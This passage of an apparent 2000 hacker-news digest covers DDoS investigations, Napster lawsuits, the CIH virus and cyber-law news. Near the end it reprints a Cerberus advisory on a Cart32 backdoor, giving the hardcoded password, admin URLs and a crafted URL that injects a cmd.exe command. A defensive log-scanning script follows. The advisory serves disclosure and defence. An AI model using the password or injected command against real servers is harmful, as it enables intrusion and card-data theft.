said they are also still looking at Coolio (Dennis Moran) as a
possible suspect.
USA Today
http://www.usatoday.com/life/cyber/tech/cth767.htm
06/07/00- Updated 07:49 PM ET
Hacker's friends may be suspects, too
By Kevin Johnson, USA TODAY
WASHINGTON - Authorities investigating the February attacks on some of the
most popular Internet sites are focusing on three close friends of the
15-year-old Canadian boy who was charged earlier this week, a senior U.S.
law enforcement official said Thursday.
The three friends of the Montreal computer hacker known as "Mafiaboy" are
among several potential suspects identified by authorities in the
cyberassaults that temporarily shut down the Web sites of CNN, Yahoo!,
Amazon.com and several other media and commercial giants.
Beyond Montreal, authorities are examining the activities of a small group
of hackers thought to be based in Israel. Officials there say the group
has been involved in various online financial crimes, some involving
stolen credit card numbers.
The group is believed to be part of a larger circle of computer users,
including Mafiaboy, who have spent time in an Internet chat room called
TNT. The chat room is accessible only by password.
Investigators also are trying to determine whether Dennis Moran, a
17-year-old New Hampshire hacker known online as "Coolio," was involved in
the attacks in February.
Moran, who authorities say has boasted of being involved in the attacks,
was charged last month in an attack on a Web site run by the Los Angeles
Police Department.
The unidentified Montreal teenager known as Mafiaboy has been charged only
in two attacks against CNN.com, which was shut down for 3 1/2 hours Feb. 8
after it was overloaded with requests.
Mafiaboy claimed credit in chat rooms for similar assaults on sites run by
Yahoo! and Buy.com. Officials believe Mafiaboy may have been capable of
directing all the assaults but doubt that he did.
Analysts familiar with the assaults say the software used to wall off
access to the CNN Web site on Feb. 8 was different and less sophisticated
than that used to paralyze Yahoo! on Feb. 7.
Michael Lyle, who runs a software security firm in Palo Alto, Calif., said
the attack on CNN involved software commonly found on Internet sites for
hackers.
"I literally could show you how to do it in three or four hours," he said.
The goal is to flood Internet sites with tens of thousands of requests,
disguising the source of the assault by routing the requests through
high-capacity computers elsewhere. The tactic overloads the targeted Web
sites, causing electronic paralysis.
Investigators say Mafiaboy orchestrated the attack on CNN.com through
computers at the University of California-Santa Barbara.
A Canadian law enforcement official said that because of Mafiaboy's age,
it is unlikely he would be sent to an adult prison if convicted of
"mischief to data."
If prosecuted and convicted as an adult, the teenager could face up to 20
years in prison. But in Canada's juvenile system, he faces a maximum of
two years in a youth detention center if convicted.
Contributing: Deborah Solomon
@HWA
106.0 [HNN] Backdoor Found in Redhat
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
April 25th
contributed by Mr. Big23
Earlier this month Internet Security Systems found a backdoor in
RedHat Linux; the problem has been labeled a 'flaw' by RedHat. The
company has been contacted and a fix has been issued. RedHat
recommends that all users of the most recent distribution who have
installed Piranha download and install this patch.
MSNBC
RedHat Updates
http://www.msnbc.com/news/399125.asp?0m
@HWA
107.0 [HNN] USC Stands Their Ground
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
April 25th
contributed by TheHex
The University of Southern California (USC) has reportedly refused to
join other universities in blocking MP3 music downloads via Napster.
The university made the announcement on Friday in response to a
lawsuit filed by Metallica, which named USC, Yale University and
Indiana University as defendants in charges alleging the schools
allowed students to pirate copyrighted music. The lawsuit has caused
both Yale and Indiana U. to implement filters on their networks to
prevent Napster use. (Go Trojans!)
NewsBytes
Indiana University - Just look at the Spin
http://www.technews.com/pubNews/00/147722.html
http://www.iuinfo.indiana.edu/ocm/releases/napster02.html
IU installs filters preventing use of MP3 music site
April 20, 2000
BLOOMINGTON, Ind. -- Indiana University announced today that it will block
all IU network traffic related to a popular MP3 music Web site called
Napster.com.
"In the rapidly evolving technology related to the Internet, copyright
issues in cyberspace remain unclear," said Christopher Simpson, IU vice
president for public affairs and government relations. "We believe Indiana
University has no liability by allowing access to sites such as Napster.
We now believe, however, that our faculty, staff and students could incur
legal exposure if they use this technology. Until those unresolved legal
issues are clarified, it seems prudent to block the site."
Heavy metal band Metallica, E/M Ventures and Creeping Death Music filed a
lawsuit last week against Napster, IU and two other colleges contending
copyright infringement. While IU does not believe it has any liability to
the plaintiffs, the lawsuit prompted a closer look at access issues.
"This issue has received a significant amount of attention in recent
days," Simpson said. "It has caused us to focus on the fact that
technology has leaped well ahead of clear legal issues. University policy
prohibits violation of copyright laws, and we believe strongly in
protecting intellectual property. Those are fundamental tenets that we
will not abandon."
Simpson said he hopes a long-term solution can be found to ensure
individuals can have access to digital music while protecting intellectual
property rights.
(Christopher Simpson, 812-855-0850, csimpson@indiana.edu)
@HWA
108.0 [HNN] Critics Chide COPPA - Disney Plan Criticized
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
April 25th
contributed by root66
The Children's Online Privacy Protection Act (COPPA) is being
criticized by web site administrators as being too costly to implement
and for encouraging kids to lie about their ages. Disney has said it
plans to ask for parents' credit card numbers when verifying parental
consent. Mastercard has issued a statement saying that credit cards
are not meant to be used for age verification. Disney has said they
will go ahead with their plan.
Computer World
Children's Online Privacy Protection Act (COPPA)
http://www.computerworld.com/home/print.nsf/all/000424D89E
http://www.ftc.gov/ogc/coppa1.htm
@HWA
109.0 [HNN] Happy CIH Virus Day
~~~~~~~~~~~~~~~~~~~~~~~~~
April 25th
contributed by Bjornar
Last year the CIH virus struck rather hard around the world (or was it
just the media hype?). April 26th will be here tomorrow, do you have
the latest virus definitions installed? CIH or Chernobyl will attempt
to overwrite sectors on the hard drive and also attempt to overwrite
the BIOS on flash-capable systems.
NAI Virus Description
http://vil.nai.com/villib/dispVirus.asp?virus_k
Dead url
@HWA
110.0 [HNN] AboveNet Hit with DDoS
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
April 26th
contributed by Evil Wench
AboveNet Communications has said that it received what it called a
'direct attack' on its infrastructure. Traffic at AboveNet was brought
to a standstill for four hours late Tuesday morning. AboveNet has
referred the matter to the FBI but says that tracking the attacker
should be easier than previous attacks.
ZD Net
http://www.zdnet.com/zdnn/stories/news/0,4586,2555422,00.html
FBI investigating new Web attack
ISP AboveNet hit by a denial-of-service attack -- blocking customers' Web
access for hours. 'It was a direct attack on our infrastructure.'
By Robert Lemos, ZDNet News UPDATED April 26, 2000 8:18 AM PT
Top-five Internet service provider AboveNet Communications suffered a
denial-of-service attack on Tuesday -- raising the specter of another
round of Web attacks. Paul Vixie, senior vice president of Internet
services for Metromedia Fiber Network Inc., AboveNet's parent company,
said the attack did not resemble February's spate of DoS attacks.
"This was not just a SMURF attack or some other broadcast storm aiming
meaningless data at our routers," Vixie said. "It was a direct attack on
our infrastructure."
The attack stopped Internet traffic to AboveNet's customers for several
hours starting late Tuesday morning.
The White Plains, N.Y., company is working with the FBI to investigate the
attack and declined to give more-specific details. Vixie did say that
tracking the attacker should not be as difficult as February's DoS attacks
had been. "Technically, there is cause for hope, where in the (denial of
service) case there was no cause for hope," he said.
Last week, a 15-year-old Canadian boy who called himself "Mafiaboy" online
was arrested by the Royal Canadian Mounted Police and charged in
connection with the denial-of-service attack on CNN's online site in
February.
The teen, whose name was not released due to his age, was arrested April
15 and formally charged two days later with two counts of mischief to data
after police searched his home. No suspects have been named in the attacks
on at least seven other sites, however.
AboveNet attack more skilled
This attacker seemed a bit more skilled
than the cybervandals who flooded eight major Web sites in February, Vixie
said. "I would bet that this was someone with a little more experience
than the last batch."
AboveNet provides Internet service to and hosts the Web sites of nearly
1,000 companies, with offices in the United Kingdom, Germany, the
Netherlands and Japan.
Vixie said Tuesday's attack could not succeed again. "We plugged the hole
that has allowed it to happen," he said.
@HWA
111.0 [HNN] Thailand Has No Software Industry Due To Piracy
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
April 26th
contributed by root
The Business Software Alliance has blamed Thailand's 82% piracy rate
for preventing the development of a local software industry. The Thai
Software Industry Association said that it expects 30% growth in the
local software industry to 7 billion baht ($447.4 million) in 2000
despite the piracy rate.
Reuters
http://dailynews.yahoo.com/h/nm/20000425/tc/thailand_piracy_1.html
Dead Url (Yahoo blows for this) - Ed
@HWA
112.0 [HNN] War Plans Found on Net
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
April 26th
contributed by Evil Wench
The Web Risk Assessment Team, a reserve component unit designed to
scour public web sites for classified information, has found quite a
lot. 1,300 'discrepancies' were found on over 800 DOD web sites,
including highly classified information. Pentagon war plans were also
discovered on at least ten separate occasions.
Federal Computer Week
http://www.fcw.com/fcw/articles/2000/0424/web-jtfcnd-04-26-00.asp
DOD Web-watchers find war plans online
BY Dan Verton
RELATED STORIES
"DOD pushing forward on Internet disconnect" [FCW.com, April 26, 2000]
"DOD boosts IT security role" [Federal Computer Week, Oct. 4, 1999]
04/26/2000
A new reserve unit that monitors the Defense Department's
presence on the World Wide Web has found an astonishing amount of
classified or sensitive material on public sites.
The Web Risk Assessment Team, established by the Joint Task Force for
Computer Network Defense, is made up of reservists who spend one weekend
each month scanning DOD Web sites, according to Air Force Maj. Gen. John
Campbell, commander of JTF-CND.
A survey of 800 major DOD sites on the Internet recently revealed as many
as 1,300 "discrepancies," some of them involving highly classified
information, Campbell said. The team uncovered more than 10 instances
where information on Pentagon war plans was posted.
Also among the discoveries has been information on computer system
vulnerabilities and more than 20 detailed maps of DOD facilities.
Some of the maps and photographs included detailed plans of a facility
known as "Site R," which serves as the alternate Joint Communications
Center for U.S. nuclear forces, according to Campbell. The overhead photo
of "Site R" showed the location of underground tunnel entryways and a
detailed floor plan of the facility.
Likewise, the Web site for an annual exercise known as "Cobra Gold"
included an entire list of participating units, communications frequencies
and call signs for aircraft and data on Identification Friend or Foe
squawks, which are signals used by pilots to determine if a plane is
friendly or enemy.
In another instance, the team found a classified excerpt in a policy
document on counterterrorism.
@HWA
113.0 [HNN] India May get New Cyber Laws
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
April 26th
contributed by root66
A federal information technology bill has been proposed in India and
is set to be voted on next month. The proposed law will create a
Cyber-Regulations Advisory Committee, a controller, and adjudicating
officers to regulate cyber laws. There will also be a
Cyber-Regulations Appellate Tribunal.
http://www.wired.com/news/culture/0,1284,35822,00.html
India Eyes Cyberlaws
by Frederick Noronha 3:00 a.m. Apr. 25, 2000 PDT
BANGALORE, India -- With estimates that nearly 2 million Indian citizens
will be online by 2001, the world's second-most populous country is
looking at ways to regulate cyberspace.
India is proposing a federal information technology bill to be voted on
next month. One of India's premier law schools, based here, has plans to
set up a national institute for cyber-legal studies and research.
The institute plans to research the problem of shifting business and trade
to the cyber-media, and blending national and international standards. It
is looking to sell the project to top Indian info-tech firms like Infosys
and Wipro through collaboration with policy planners in the Indian
government.
"We have made our blueprint, and plan to shortly approach friends in the
info-tech sector," said Dr. Nripen L. Mitra, director of the National Law
School of India University.
Bangalore, known as India's Silicon Valley, is a booming center for
software and dot-com companies. By the late 1990s, the city's software
exports comprised nearly 57 percent of India's total exports. The city has
an estimated 230 info-tech companies, employing nearly 25,000
professionals.
Mitra said rapid growth is in need of swift responses.
"Law behaves like a traditional Hindu wife, staying seven steps behind the
husband," he said.
The new high-tech economy also means Indian businessmen have to shift to
the paperless world after adapting to doing business in a very
bureaucratic country.
"Until recently, there were no cyberlaws in India," said Na Vijayashankar,
the author of a new book that explains the new laws that may take shape to
control, regulate, and harness cyberspace for Indian e-commerce.
The federal government recently brought forward the Information Technology
Bill. Under the proposed law, which is expected to be tabled in New
Delhi's Parliament in May, India will have a Cyber-Regulations Advisory
Committee, a controller, and adjudicating officers to regulate cyberlaws.
There will also be a Cyber-Regulations Appellate Tribunal.
The proposed law defines what constitutes a cybercrime, and also has
provisions to punish cyber-criminals. It sets up a framework for
transactions involving computer-generated documents and communication.
It also deems electronic documents as legally binding and acceptable in
place of paper. Checks and bills, powers of attorney, trusts, wills, and
contracts of sale of immovable property, however, will not be accepted in
a digital format.
Computer crimes recognized under the proposed law would affect hackers,
and those who are not authorized to enter a system to download data,
introduce viruses, damage data or the system, block access to authorized
users, or even assist another person in contravening the law.
Publishing electronic information that is considered obscene, tampering
with computer source documents, breaching confidentiality, publishing
false digital certificates, and failing to furnish information or tax
returns also would be a violation of the law.
If passed, the law would apply to anyone in or outside of India who
tampers with a computer located in India.
Contrary to other Indian laws, such as the Code of Criminal Procedure of
1973, additional powers have been given to the police to tackle
cybercrime. Any senior police officer can enter and search any public
place on suspicion without a warrant.
Those guilty of securing access to the system without authorization could
be fined up to 1 million rupees. Payment of damages would be made to the
person affected.
There are critics, of course.
Some say the software sector has flourished in India precisely because of
a lack of regulation. So while the framework for accepting electronic
documents is welcome, businessmen say the government should stay out of
trying to regulate much of the rest.
Senior Indian government officials, however, point to some shocking cases,
arguing that there's a need to regulate the cyberjungle.
They cite cases where a popular Hindi film actress was depicted nude on
the Internet using altered graphics. They also point to prominent cases of
cybersquatting, where some small firms allegedly tried to snatch the trade
names of huge newspapers.
"We had no remedies in such cases. Night and day, hackers are taking on
portals, too," said Gulshan Rai, the Ministry of Information Technology's
senior director.
Some Indian sites have also been the victims of hacking, especially after
last year's federally-sanctioned nuclear tests in Rajasthan, near the
Indo-Pakistan border.
Rai said the IT bill would take care of issues of "authentication,
origination, jurisdiction and attribution." In some cases of criminalized
cyber-behavior, the liability would be civil. But repeated and more severe
cases would be treated as criminal liability, Rai said.
E-commerce transactions are leading to ludicrous situations in taxation,
said India's IT task force member Montek S. Ahluwalia. Music sold
internationally on cassette tapes is being taxed, but the same music sold
in digital format is not; services sold over the Net internationally are
not taxed, while those sold within the country are, Ahluwalia said.
Rai said the cyber-surveillance and interceptions provisions of the new IT
bill would require those offering over 2MB of bandwidth to give access to
traffic to agencies like the Intelligence Bureau and Central Bureau of
Investigation.
There are other laws already in place relating to cybercrimes.
"Just because you're on the Internet doesn't put you above national laws.
Pornography and gambling is prohibited under the Indian Penal Code of
1860, advertisement regulations apply, and you can get hauled up for
defamation, libel or slander," said Annapurna Ogoti, of the law firm
Nishit Desai Associates.
@HWA
114.0 [HNN] Napster Backs 'Bizkit
~~~~~~~~~~~~~~~~~~~~~~~~~~~
April 26th
contributed by The Hex
Limp Bizkit has taken on controversial Napster as a sponsor of its
free summer concert tour. The group's lead singer said that Napster was
all about getting his art to the people and criticized people who
chose to try and stop that.
Wired
http://www.wired.com/news/business/0,1367,35881,00.html
@HWA
115.0 [HNN] Dr. Dre Sues Students for Napster Use
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
April 26th
contributed by root
Rap artist Dr. Dre has filed suit against five universities and
students for violating copyright laws by using Napster. The lawsuit
did not specifically name any students or schools; it left them open to
be named later. The lawsuit seeks $100,000 per illegally copied work.
In an unrelated story, Dr. Dre has been sued by LucasFilm for using the
trademark THX sound at the beginning of his album, even after being
denied permission. (I guess it is OK to steal other people's work as
long as they don't steal yours.)
C|Net
http://news.cnet.com/news/0-1005-200-1760313.html?tag
Rap artist sues Napster, students
By John Borland Staff Writer, CNET News.com
April 25, 2000, 5:00 p.m. PT
Rap artist Dr. Dre sued MP3-swapping
firm Napster today, adding a new layer of legal woes to the already
besieged company.
But this time, the stakes are being raised: Dr. Dre also is targeting
students at universities who are using the Napster software to download
MP3 files, putting individual music listeners into the legal line of fire.
It's the second lawsuit filed by musicians who say the controversial
software is responsible for massive violations of their copyrights. Heavy
metal band Metallica also is seeking to close Napster's digital doors.
Dr. Dre demanded last week that Napster remove his work from its service.
But the company refused, saying it could only remove individual users
identified as copyright violators.
In response, the artist is asking that the court shut down Napster and
award damages of $100,000 per illegally copied work. That could amount to
close to $10 million, according to the lawsuit.
"Napster devised and distributes software whose sole purpose is to permit
(the company) to profit by abetting and encouraging the pirating of the
creative efforts of the world's most admired and successful musical
artists," the suit reads.
The young company, started last year by 19-year-old student Shawn Fanning,
has thrown the music industry into a kind of panic. Fanning's software
allows people to link their computers directly to each other to share
their music collections without paying companies or artists for the songs.
At any time, thousands of people are online, sharing hundreds of thousands
of songs through Napster's directory.
The Recording Industry Association of America (RIAA) was the first to take
legal action, suing Napster late last year. Metallica joined this month
but set its legal sights on three universities it said were responsible
for their students' illegal use of the software.
But Dr. Dre, whose real name is Andre Young, also trains the specter of
legal responsibility directly on the students themselves.
No individual students or universities were named in the version of Dr.
Dre's suit filed today. Instead, it is serving as a kind of placeholder,
noting that five schools and students will be named later.
That could serve as an effective scare tactic, based on events of the past
week. Already the three universities named in Metallica's lawsuits have
blocked or sharply restricted use of Napster on their campuses. The threat
of any other school or student being added to this new lawsuit could push
other universities in the same direction and dissuade students from using
the service.
Dr. Dre himself released a terse explanation for his legal action. "I
don't like people stealing my music," he said in a press release today.
In a coincidence of the courts, Dr. Dre himself was sued for copyright
infringement last week. George Lucas' LucasFilm contends that the artist
used the trademarked THX sound, which appears before many movies, to open
his most recent album, even after being denied permission.
Dr. Dre's suit was filed in a Los Angeles federal court.
(Dr. Dre fuck you, and fuck Metallica, quit listening to your lawyers and
go hunt the real pirates, like buy a clue. - Ed )
@HWA
116.0 [HNN] Chernobyl Hits South Korea
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
April 27th
contributed by root
The Ministry of Information and Communication in South Korea has
reported that it has received almost 2,000 complaints regarding the
Chernobyl or CIH virus. Last year CIH infected almost 300,000 systems
in the country.
ZD Net
http://www.zdnet.com/zdnn/stories/news/0,4586,2555878,00.html?chkpt
Chernobyl virus nukes S. Korean PCs
Thousands of small businesses and personal users had their hard drives
cleaned out by the infamous CIH virus.
By Reuters April 26, 2000 7:02 AM PT
SEOUL -- The so-called Chernobyl computer virus struck South Korea on
Wednesday, wiping out hard disks at hundreds of companies, the Ministry of
Information and Communication said on Wednesday. The ministry
reported it received almost 2,000 complaints about the virus, which struck
on the 14th anniversary of the Chernobyl nuclear accident in the Ukraine.
A ministry official said far worse damage was caused last year.
"In 1999, the outbreak of the virus affected up to 300,000 computers, and
larger companies took the brunt of the damage," said the official. "This
time, it's likely to be 5 percent of that."
He said individuals and small companies accounted for more than 70 percent
of the complaints reported on Wednesday.
He gave no estimate of the value of the damage caused by the virus erasing
data on hard disk drives and corrupting communications software.
@HWA
117.0 [HNN] Russian Gas Supplier Invaded by Cyber Criminals
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
April 27th
contributed by mr.big23 and William Knowles
Gazprom, a huge state-run gas monopoly, was one of many targets hit by
cyber criminals last year in Russia, officials have said. Acting with
an employee at the company, the criminals were able to bypass the
company's security and gain access to the gas control systems. The
report also registered 852 cases of computer crime in Russia in 1999,
up twelve-fold from the year before. (This story sounds more like a
convenient way to place blame on hackers over likely Russian
mismanagement or corruption.)
Associated Press - via Nando Times
http://www.nandotimes.com/technology/story/body/0,1634,500197283-500270387-501418162-0,00.html
Deceased Url
@HWA
118.0 [HNN] G8 Plans Cyber Security Conference
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
April 27th
contributed by root66
The Group of Eight major industrialized nations will hold a conference
in Paris next month about how governments and companies should
interact when confronted with cybercrime. The May 15-17 conference
will be attended by representatives of 150 major private firms
alongside delegations from G-8 states Italy, France, Britain, Germany,
Japan, Russia, Canada and the United States. The conference's aim was
to study the challenges to security and consumer confidence posed by
new information and communication technologies.
Associated Press - via San Jose Mercury News
http://www.mercurycenter.com/svtech/news/breaking/internet/docs/467487l.htm
Url died
@HWA
119.0 [HNN] Cyber Crime Institute Established
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
April 27th
contributed by mr.big23
Carnegie Mellon University has created a research institute this month
dedicated to prevention rather than response. (Yeah!) The Carnegie Mellon
Institute for Survivable Systems will work with both the public and
private sector and will use resources and people from the CERT
coordination center.
CNN
http://www.cnn.com/2000/TECH/computing/04/26/cybersecurity/index.html
Carnegie Mellon establishes anti-hacking institute
April 26, 2000 Web posted at: 5:16 p.m. EDT (2116 GMT)
By Richard Stenger CNN Interactive Writer
PITTSBURGH, Pennsylvania (CNN) -- A Pennsylvania university created a
research institute this month dedicated to fighting computer attacks like
those that besieged major Web sites like eBay, Yahoo! and CNN.com in
February.
Unlike other computer network security R&D centers, the Carnegie Mellon
Institute for Survivable Systems will solicit private as well as federal
funds and concentrate on prevention rather than response, according to
CMISS officers.
The new research group, which will seek partnerships and fee-for-service
arrangements with the public and private sectors, will draw resources and
personnel from other Carnegie University facilities, in particular from
the CERT Coordination Center.
But unlike the CERT center, CMISS will not have restrictive limits on
corporate money. The CERT center receives most of its money from U.S.
agencies like the Department of Defense, the FBI and the IRS.
And the federal government sets strict limits for private investment in
the center, said Bill Pollack, a spokesman for CMU's Software Engineering
Institute, the parent department of CERT and CMISS.
"There's a limit on growth because of that. CMISS enables the Carnegie
Mellon community to get all kinds of funding," Pollack said.
CMISS hopes eventually to have an annual operating budget of $40 million,
in large part funded by the private sector, he said.
E-commerce businesses could be receptive to CMISS' research, considering
sporadic attacks from an average teenager can cost them billions of
dollars.
"There hasn't been a good foundation of data available to help researchers
understand the key factors that contribute to actual losses," said CMU
Computer Science Dean James Morris, in a statement.
The CERT center was created after the Morris Worm incident crippled about
10 percent of all computers on the Internet in 1988. Since then dozens of
computer emergency response teams have sprung up, but they tend to focus
on hacking breaches after the fact, according to CMISS. The new institute
will try to solve network security problems before they have a broad
impact.
"Information assurance, as it's practiced today, is not a science. It
remains largely ad hoc," said CMU Engineering Dean John Anderson, in a
statement.
CMISS has already earned praise from Sen. Rick Santorum of Pennsylvania.
"Carnegie Mellon's ... effort will, for the first time, establish a
public-private partnership that will help safeguard our national
security," Santorum said in a statement. He chairs the U.S. Senate's task
force on cybersecurity.
@HWA
120.0 [HNN] Domain Lock Down Launched
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
April 27th
contributed by mr.big23
Domain registrar Register.com Inc. Wednesday launched Domain Lock
Down, a service that protects domain names from being hijacked. The new
service will be able to "lock" names at the registry level, which
helps prevent unauthorized alterations to name server and registrar
information and blocks deletions of a domain name for the length of
the registration term.
Internet News
http://www.internetnews.com/bus-news/article/0,2171,3_348071,00.html
Register.com Launches Domain Security Service
By Carol King
Domain registrar Register.com Inc. Wednesday launched Domain Lock Down, a
service that protects domain names from being hijacked.
With the new service, register.com (RCOM), "locks" names at the registry
level, which helps prevent unauthorized alterations to name server and
registrar information and blocks deletions of a domain name for the length
of the registration term.
As a result, customers using the service have greater security over their
domain names and can reduce the risk of illegal tampering. The service
costs $99 per name.
In light of the recent hijacking incidents, register.com felt it was
essential to provide customers with peace of mind, according to Richard
Forman, the company's president and chief executive officer.
"Because a domain name is the key access point to the Internet, businesses
cannot afford to suffer the effects of illegal domain tampering," he says.
"By locking down a domain, register.com corporate services customers
increase the security of their business."
@HWA
121.0 [HNN] Backdoor Found in Shopping Cart Software
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
April 28th
contributed by root66
Cerberus Information Security has found a secret password that allows
someone connecting to a web site running "Cart32" shopping cart
software to gain access to the server. The backdoor could reveal such
data as credit card numbers, order information, and shipping
addresses. McMurtrey-Whitaker, which sells Cart32, said that they will
have a patch available next week. @Stake L0pht labs has issued its own
fix for users who cannot wait that long.
Cerberus-infosec
@Stake L0pht Labs
Wired
ZD Net
http://www.cerberus-infosec.co.uk/advcart32.html
http://www.l0pht.com/
http://www.wired.com/news/politics/0,1283,35954,00.html
http://www.zdnet.com/zdnn/stories/news/0,4586,2556876,00.html
Cerberus Information Security Advisory (CISADV000427)
http://www.cerberus-infosec.co.uk/advisories.shtml
Released         : 27th April 2000
Name             : Cart32 secret password Backdoor
Affected Systems : Any Win32 based web server using Cart32
Issue            : Attackers can run arbitrary commands on the web server
                   and/or gain access to credit card information.
Authors          : David Litchfield (mnemonix@globalnet.co.uk) and
                   Mark Litchfield (xor-syst@devilnet.co.uk)
Description
***********
The Cerberus Security Team has discovered a serious security hole in
McMurtrey/Whitaker & Associates, Inc's Win32 e-Commerce shopping cart,
namely, Cart32 (http://www.cart32.com/) that can only be described as a
blatant backdoor. Within cart32.exe, the main file that provides the cart's
functionality, there is a secret hidden password that can be used to gain
vital information such as other passwords and using these an attacker can
modify the shopping cart's properties so that arbitrary commands may be run
on the server as well as gain access to customers' credit card details,
shipping addresses and other highly sensitive information.
Details
*******
Within cart32.exe there is a secret backdoor password of "wemilo" (found at
file offset 0x6204h) known internally as the Cart32Password. With knowledge
of this password an attacker can go to one of several undocumented URLs such
as http://charon/scripts/cart32.exe/cart32clientlist and obtain a list of the
passwords for each Cart32 client. (A client is essentially a shop site).
Although these passwords appear to be hashed they can still be used. For
example they can be embedded in a specially crafted URL that will allow the
attacker to prime the server to run an arbitrary command when an order is
confirmed:
http://charon/scripts/c32web.exe?TabName=Cart32%2B&Action=Save+Cart32%2B+Tab
&SaveTab=Cart32%2B&Client=foobar
&ClientPassword=e%21U%23_%25%28%5D%5D%26%25*%2B-a&Admin=&AdminPassword=&TabT
oSave=Cart32%2B&PlusTabToSave=
Run+External+Program&UseCMDLine=Yes&CMDLine=cmd.exe+%2Fc+dir+%3E+c%3A%5Cfile
.txt
This URL will set the cart's properties to spawn a shell, perform a
directory listing and pipe the output to a file called file.txt on the root
of the C: drive when an order is confirmed. After doing this the attacker
would then create a spurious order and confirm it thus executing the
command. (Please note that the above URL is pertinent only to an internal
Cerberus server - password details and client info would need to be changed
to reflect the site in question).
Further to this the Cerberus Security Team has found what is, perhaps, a
second backdoor. By going directly to the following URL
http://charon/scripts/c32web.exe/ChangeAdminPassword it is possible to
change the administrative password without knowledge of the previous one.
Solution
********
Cerberus recommends that the following steps be actioned immediately.
Cerberus has tested this in their labs and the Cart functionality will not
be broken by following these steps.
1) Download a Hex Editor such as UltraEdit (http://www.ultraedit.com) and
edit cart32.exe changing the "wemilo" password to something else. This will
address the first issue.
2) Because c32web.exe is the administration program for Cart32 only site
administrators will need access to it. Set the NTFS permissions on this file
so that only Administrators have access to it. This way anyone attempting to
access this file to change the admin password will be prompted for an NT
account and password. For other "servers" such as Windows 95 and 98 Cerberus
recommends removing this file.
Cerberus vulnerability scanner, CIS, has been updated to include checks for
these issues and is available for free download from their website
http://www.cerberus-infosec.com/
Vendor Status
*************
Due to the severity and seriousness of this issue, Cerberus has taken the
rare step of making this information publicly available before the vendor
has provided a patch. This is not normally Cerberus policy, however, as we
have provided fix/workaround information in this advisory we believe we are
not putting customers at any risk they would not have otherwise been exposed
to.
About Cerberus Information Security, Ltd
********************************
Cerberus Information Security, Ltd, a UK company, are specialists in
penetration testing and other security auditing services. They are the
developers of CIS (Cerberus' Internet security scanner) available for free
from their website: http://www.cerberus-infosec.com
To ensure that the Cerberus Security Team remains one of the strongest
security audit teams available globally they continually research operating
system and popular service software vulnerabilities leading to the discovery
of "world first" issues. This not only keeps the team sharp but also helps
the industry and vendors as a whole ultimately protecting the end consumer.
As testimony to their ability and expertise one just has to look at exactly
how many major vulnerabilities have been discovered by the Cerberus Security
Team - over 60 to date, making them a clear leader of companies offering
such security services.
Founded in late 1999, by Mark and David Litchfield, Cerberus Information
Security, Ltd are located in London, UK but serve customers across the
World. For more information about Cerberus Information Security, Ltd please
visit their website or call on +44(0) 208 395 4980
Permission is hereby granted to copy or redistribute this advisory but only
in its entirety.
Copyright (C) 2000 by Cerberus Information Security, Ltd
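A log check for step 2 of the advisory's Solution, added here as an example
(it is not part of the Cerberus advisory or of CIS): it separates requests
for c32web.exe that were served anonymously from those that met the NT
authentication prompt. The W3C extended log layout, the field names and the
sample lines are constructed assumptions; only the two paths come from the
advisory.

```python
"""Flag requests to the Cart32 admin program in W3C extended web logs."""
from urllib.parse import unquote

# Paths from the advisory, lower-cased: Windows web servers ignore case.
ADMIN_PROGRAM = "/scripts/c32web.exe"
PASSWORD_RESET = ADMIN_PROGRAM + "/changeadminpassword"

# Constructed sample (assumed IIS W3C extended format, documentation IPs).
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Server 4.0
#Fields: date time c-ip cs-username cs-method cs-uri-stem sc-status
2000-04-27 10:01:12 192.0.2.10 - GET /scripts/cart32.exe 200
2000-04-27 10:02:40 198.51.100.7 - GET /scripts/c32web.exe/ChangeAdminPassword 200
2000-04-27 10:03:05 198.51.100.7 - GET /SCRIPTS/C32WEB.EXE/%43hangeAdminPassword 401
2000-04-27 10:04:51 192.0.2.44 shopadmin GET /scripts/c32web.exe 200
2000-04-27 10:05:00 192.0.2.10 - GET /scripts/c32web.exe.bak 404
"""


def normalize(uri_stem):
    """Percent-decode, unify slashes and lower-case a request path."""
    path = unquote(uri_stem).replace("\\", "/").lower()
    while "//" in path:
        path = path.replace("//", "/")
    return path


def target_of(path):
    """Name what a normalized path refers to, or None if it is unrelated."""
    # Require an exact match or a "/" boundary so c32web.exe.bak is ignored.
    if path != ADMIN_PROGRAM and not path.startswith(ADMIN_PROGRAM + "/"):
        return None
    if path == PASSWORD_RESET or path.startswith(PASSWORD_RESET + "/"):
        return "password-reset"
    return "admin-program"


def verdict_for(status, username):
    """Judge one hit from its HTTP status and the logged user name."""
    if status in (401, 403):
        return "denied"  # the NTFS permissions forced an NT logon prompt
    if 200 <= status < 400:
        # "-" in cs-username means the request was served anonymously.
        return "exposed" if username == "-" else "authenticated"
    return "other"


def scan(log_text):
    """Return (client_ip, target, verdict) for every hit on c32web.exe."""
    fields, findings = [], []
    for line in log_text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]  # column order can change mid-file
            continue
        if line.startswith("#") or not line.strip() or not fields:
            continue
        values = line.split()
        if len(values) != len(fields):
            continue  # skip malformed or truncated records
        rec = dict(zip(fields, values))
        target = target_of(normalize(rec.get("cs-uri-stem", "")))
        status = rec.get("sc-status", "")
        if target is None or not status.isdigit():
            continue
        verdict = verdict_for(int(status), rec.get("cs-username", "-"))
        findings.append((rec.get("c-ip", "-"), target, verdict))
    return findings


if __name__ == "__main__":
    for ip, target, verdict in scan(SAMPLE_LOG):
        print(f"{ip:15} {target:15} {verdict}")
```

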